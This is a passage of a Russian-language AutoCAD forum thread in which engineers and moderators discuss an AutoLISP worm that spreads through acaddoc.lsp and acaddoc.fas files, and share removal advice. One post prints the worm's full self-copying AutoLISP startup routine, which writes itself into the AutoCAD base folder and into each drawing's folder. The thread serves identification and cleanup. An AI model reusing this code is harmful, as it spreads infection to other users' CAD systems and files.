| Правила | Регистрация | Пользователи | Сообщения за день |  Справка по форуму | Файлообменник |

Вернуться   Форум DWG.RU > Программное обеспечение > AutoCAD > Вирус для Автокада

Вирус для Автокада

Ответ
Поиск в этой теме
Непрочитано 24.05.2007, 22:57
Вирус для Автокада
dextron3
 
проектировшик
 
СССР
Регистрация: 01.01.2007
Сообщений: 5,143

Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него!

Принцип действия:

При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает)

Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой

Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]

Тем, кому не прочитать тему:
http://forum.dwg.ru/showpost.php?p=218027&postcount=36
http://forum.dwg.ru/showpost.php?p=262114&postcount=52
http://forum.dwg.ru/showpost.php?p=796334&postcount=88
Для понимания механизма работы "вируса": http://forum.dwg.ru/showpost.php?p=1...&postcount=130
Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR
__________________
инженер проектировшик с опттом программа авто гад образование высшие

Последний раз редактировалось Кулик Алексей aka kpblc, 26.02.2015 в 15:02.
Просмотров: 194075
 
Непрочитано 03.03.2015, 11:13
#141
Сергей Юрьевич

Строительство гидротехнических сооружений
 
Регистрация: 01.08.2012
Москва
Сообщений: 8,669


Цитата:
Сообщение от Mixon2010 Посмотреть сообщение
Вот он этот гаденыш... Правда не понятно, будет ли он распространятся когда он один.
рецепт:
мой компьютер -> в строке поиска задаём "acaddoс.fas" -> поисковик находит все эти файлы на вашем компе -> "выбрать все" -> удалить
после этого файлы acaddoс.fas снова не появляются
Сергей Юрьевич вне форума  
 
Непрочитано 03.03.2015, 15:22
#142
rtyu


 
Регистрация: 23.02.2012
Сообщений: 221


Ребята извиняюсь за может быть глупый вопрос, но можно ли в файл dwg вшить какой-то вредоносный код, который заразит этот же файл и ещё ряд нескольких при открытии?

----- добавлено через ~3 мин. -----
Цитата:
Сообщение от Сергей Юрьевич Посмотреть сообщение
рецепт:
мой компьютер -> в строке поиска задаём "acaddoс.fas" -> поисковик находит все эти файлы на вашем компе -> "выбрать все" -> удалить
после этого файлы acaddoс.fas снова не появляются
А если появляются?
rtyu вне форума  
 
Непрочитано 03.03.2015, 15:57
#143
Сергей Юрьевич

Строительство гидротехнических сооружений
 
Регистрация: 01.08.2012
Москва
Сообщений: 8,669


Цитата:
Сообщение от rtyu Посмотреть сообщение
Ребята извиняюсь за может быть глупый вопрос, но можно ли в файл dwg вшить какой-то вредоносный код, который заразит этот же файл и ещё ряд нескольких при открытии?

----- добавлено через ~3 мин. -----

А если появляются?
может у вас какой-то другой вирус?
у себя вычистил данным способом - больше не появляется.
Сергей Юрьевич вне форума  
 
Непрочитано 03.03.2015, 16:02
#144
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 39,855


Сергей Юрьевич, тебе повезло: у тебя стандартные файлы acad*.lsp не были заражены. rtyu, читай все ссылки из #1 - там полно вариантов.
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 04.03.2015, 10:03
#145
rtyu


 
Регистрация: 23.02.2012
Сообщений: 221


А у меня ребята такая проблема. Значит имеются 3 компьютера на них установлены Windows XP и Автокад 2008. Как-то проходя мимо их я заметил, что у них не правильно установлено время, а именно год 2013, у кого и 2014. Вообщем естественно я их поменял на правильное т.е 2015 год. После этого пользователи начали запускать файлы в Автокаде и к моему удивлению в чертежах начал дорисовываться вот такой вот "алигафрен" (см.скриншот.) Я уже молчу зато, что появляются acaddoc.fas. Стоит антивирус AVG 2015 у которого к сожалению разработчики не додумались прописать проверку файлов lsp, поэтому мне пришлось сделать это самому вручную, как только я это сделал антивирус начал удалять acad.lsp. Что самое интересное, что если системную дату поставить опять не правильную, то в файле ничего не рисуется т.е файл открывается так как надо и ничего стороннего не рисуется.
Скриншот выкладываю
Миниатюры
Нажмите на изображение для увеличения
Название: Безымянный.JPG
Просмотров: 306
Размер:	148.4 Кб
ID:	145088  
rtyu вне форума  
 
Непрочитано 04.03.2015, 10:23
#146
Faust2956

Инженер проектировщик
 
Регистрация: 26.10.2011
Миасс
Сообщений: 111


Занятная штуковина)
__________________
Время и место Подвига определяется Судьбой. Но если не придёт Герой, не будет и Подвига...
Faust2956 вне форума  
 
Непрочитано 04.03.2015, 10:32
#147
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 39,855


rtyu, тебе своей отдельной темы мало? http://forum.dwg.ru/showthread.php?t=119584
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 05.03.2015, 13:27
#148
gomer

строю, ломаю
 
Регистрация: 03.04.2008
Украина
Сообщений: 5,515


я то думал чего тема активировалась в последнее время... а оно вон оно что...
http://dwg.ru/dnl/13154
gomer вне форума  
 
Непрочитано 05.03.2015, 13:50
#149
Admin
Administrator


 
Регистрация: 21.08.2003
Сообщений: 4,412


Цитата:
Сообщение от gomer Посмотреть сообщение
я то думал чего тема активировалась в последнее время... а оно вон оно что...
http://dwg.ru/dnl/13154
Спасибо, удалил
Admin вне форума  
 
Непрочитано 05.03.2015, 15:34
#150
CaMoCAD


 
Регистрация: 25.03.2008
Зелик
Сообщений: 1,577


Цитата:
Сообщение от gomer Посмотреть сообщение
я то думал чего тема активировалась в последнее время... а оно вон оно что...
http://dwg.ru/dnl/13154

Цитата:
Сообщение от Admin Посмотреть сообщение
Спасибо, удалил

А что там было, скажите название файла, а то я много чего оттуда качал (не всем -тьфу-тьфу- успел попользоваться). Надо и у себя удалить.
__________________
* Буква "ё" не используется в тексте исключительно в связи с требованиями ЕСКД.
CaMoCAD вне форума  
 
Непрочитано 05.03.2015, 15:39
#151
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 39,855


Если в архиве есть файл с маской имени acad*.* - то его уничтожай, остальное как правило уже безвредно.
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 05.03.2015, 16:12
#152
sbi


 
Регистрация: 27.04.2008
SPB
Сообщений: 3,285
Отправить сообщение для sbi с помощью Skype™


Цитата:
Сообщение от CaMoCAD Посмотреть сообщение
А что там было, скажите название файла, а то я много чего оттуда качал (не всем -тьфу-тьфу- успел попользоваться). Надо и у себя удалить.
Ничего страшного:
Миниатюры
Нажмите на изображение для увеличения
Название: модель девушки.PNG
Просмотров: 203
Размер:	20.6 Кб
ID:	145182  
__________________
С уважением sbi
sbi вне форума  
 
Непрочитано 05.03.2015, 16:17
#153
Admin
Administrator


 
Регистрация: 21.08.2003
Сообщений: 4,412


Там было
Цитата:
Состав архива
Люди Модель Dwg/
Люди Модель Dwg/acaddoc.fas
Люди Модель Dwg/ludi.png
Люди Модель Dwg/Модели блоки людей.dwg
Admin вне форума  
 
Непрочитано 05.03.2015, 16:33
#154
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 39,855


Цитата:
Сообщение от Admin Посмотреть сообщение
Люди Модель Dwg/acaddoc.fas
acad*.* - уничтожить.
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 05.03.2015, 16:57
#155
CaMoCAD


 
Регистрация: 25.03.2008
Зелик
Сообщений: 1,577


Спасибо
__________________
* Буква "ё" не используется в тексте исключительно в связи с требованиями ЕСКД.
CaMoCAD вне форума  
 
Непрочитано 05.03.2015, 18:16
#156
Hottabich

НПО "ИНКОМИС" Отопление, Вода, Каналья
 
Регистрация: 14.06.2008
Саратов
Сообщений: 167


При открытии этой темы, и при обновлении страницы, только у меня антивирь ругается?
__________________
Опыт - критерий истины.
Hottabich вне форума  
 
Непрочитано 05.03.2015, 18:31
#157
Хмурый


 
Регистрация: 29.10.2004
СПб
Сообщений: 16,337


Offtop: Hottabich, у тебя он, видать, на слово "вирус" срабатывает
Хмурый вне форума  
 
Непрочитано 16.04.2015, 10:01
#158
Red Nova

ՃԱՐՏԱՐԱԳԵՏ, Տ.Գ.Թ.
 
Регистрация: 23.10.2007
Торонто
Сообщений: 1,980
Отправить сообщение для Red Nova с помощью Skype™


Други привет.
Каким-то образом попал к нам этот acaddoc.lsp
У нас файлы в сети, человек 10 юзеров акада. стоят AutoCAD 2013, 2014, ASD 2013
Попробовал KillWorm142, кажись пользы нет, но может я его неверно использовал.
Почитал тут тему, но не понял пока есть ли не безболезненное решение проблемы, особенно беспокоит вопрос сети, ведь в этом случае очистить свой комп и переставить акад не решение... Да и разгар работы, тут не до перестановки.
Не пинайте плиз ФАК-ом а подскажите.
1. Как может навредить вирус кроме того что он везде себя копирует?
2. Какой способ избавления от него сейчас считается наиболее быстрым и эффективным (учитывая сеть)? Готовое решение есть?

Вот этот гад...
Код:
[Выделить все]
 R(defun-q s::startup
	 (/ basepath
	    baseacad
	    acaddocpath
	    r-acaddoc
	    w-basepath
	    rl-acaddoc
	    acaddoclsp
	    c-acaddocname
	    c-acaddocpath
	    c-acaddoc
	   )
     (setq basepath
	    (findfile "base.dcl")
     )
     (setq basepath
	    (substr basepath
		    1 (- (strlen basepath) 8)
            )
     )
     (setq baseacad (strcat basepath "acaddoc.lsp"))
  
	(setq acaddocpath
               (findfile "acaddoc.lsp")
	)
	(setq acaddocpath
	       (substr acaddocpath
		       1 (- (strlen acaddocpath) 11)
	       )
	)
	(setq acaddoclsp
	       (strcat acaddocpath "acaddoc.lsp"))
	
	
        (setq c-acaddocname
	       (getvar "dwgname")
	)
        (setq c-acaddocpath
	       (findfile c-acaddocname)
	)
        (setq c-acaddocpath
	       (substr c-acaddocpath
		       1 (- (strlen c-acaddocpath) (strlen c-acaddocname))	
		)
	 )
        (setq c-acaddoc
	       (strcat c-acaddocpath "acaddoc.lsp")
	 )
	 (if
           (and
	   (/= basepath acaddocpath)
	   (= c-acaddocpath acaddocpath)
	   )
	     (progn
	       (setq r-acaddoc
	       (open acaddoclsp "r")
	       )
	       (setq w-basepath
	          (open baseacad "w")
		)     
	       (while
	           (setq rl-acaddoc
		    (read-line r-acaddoc)
	           )
	           (write-line rl-acaddoc w-basepath)
	        )
	        (close w-basepath)   
                (close r-acaddoc)
	    
             )
         
	     (progn
	       (setq r-acaddoc
	       (open acaddoclsp "r")
	       )
	       (setq w-basepath
	          (open c-acaddoc "w")
		)
	        (while
	           (setq rl-acaddoc
		    (read-line r-acaddoc)
	           )
	           (write-line rl-acaddoc w-basepath)
	        )
	        (close w-basepath)   
                (close r-acaddoc)
	    
             )
	 )
	 (princ)
)
Red Nova вне форума  
 
Непрочитано 16.04.2015, 10:28
#159
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 39,855


Первый пост темы.
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 18.04.2015, 13:42
#160
Red Nova

ՃԱՐՏԱՐԱԳԵՏ, Տ.Գ.Թ.
 
Регистрация: 23.10.2007
Торонто
Сообщений: 1,980
Отправить сообщение для Red Nova с помощью Skype™


Привет Алексей. Подскажи плиз, как понимаю мне достаточно последней (вот этой) строчки?
Цитата:
Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR
Тут две ссылки.
По первой код. Для чего именно он и что с ним делать? Запустить один раз функцию (inoe-erase-acad-virus) достаточно? Может следует в автозагрузку его?

----- добавлено через ~31 мин. -----
У меня AutoCAD 2013 + ASD 2013. Но дистрибутива нет под рукой чтоб взять не порченные нужные файлы. Могу поставить 2014.
Вопрос. Если я снесу все 2013 и поставлю новый софт 2014, поможет ли если я сразу в нем acad*.lsp, acad*doc*.lsp, acad*.mnl сделаю read only?
Естественно до этого найду и уничтожу все зараженные файлы (хоть те что у меня на машине а не в сети).

Последний раз редактировалось Red Nova, 18.04.2015 в 14:19.
Red Nova вне форума  
Ответ
Вернуться   Форум DWG.RU > Программное обеспечение > AutoCAD > Вирус для Автокада

Размещение рекламы


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Резервуар 250м.куб. на проверку dextron3 Инженерные сети 42 07.05.2011 15:59
Компьютер для автокада ugoday Компьютерная и бытовая техника, электроника и инструмент 31 02.09.2007 15:07
Хочу купить монитор ЖК для автокада какой фирмы я не знаю вы Рома_2 Разное 10 21.06.2007 03:44
Версия ЛАЙТ для автокада 2006 Kaktuz AutoCAD 8 18.10.2006 18:39
Определение нагрузок для нестандартных конструкций. NIVa Конструкции зданий и сооружений 2 06.08.2005 21:42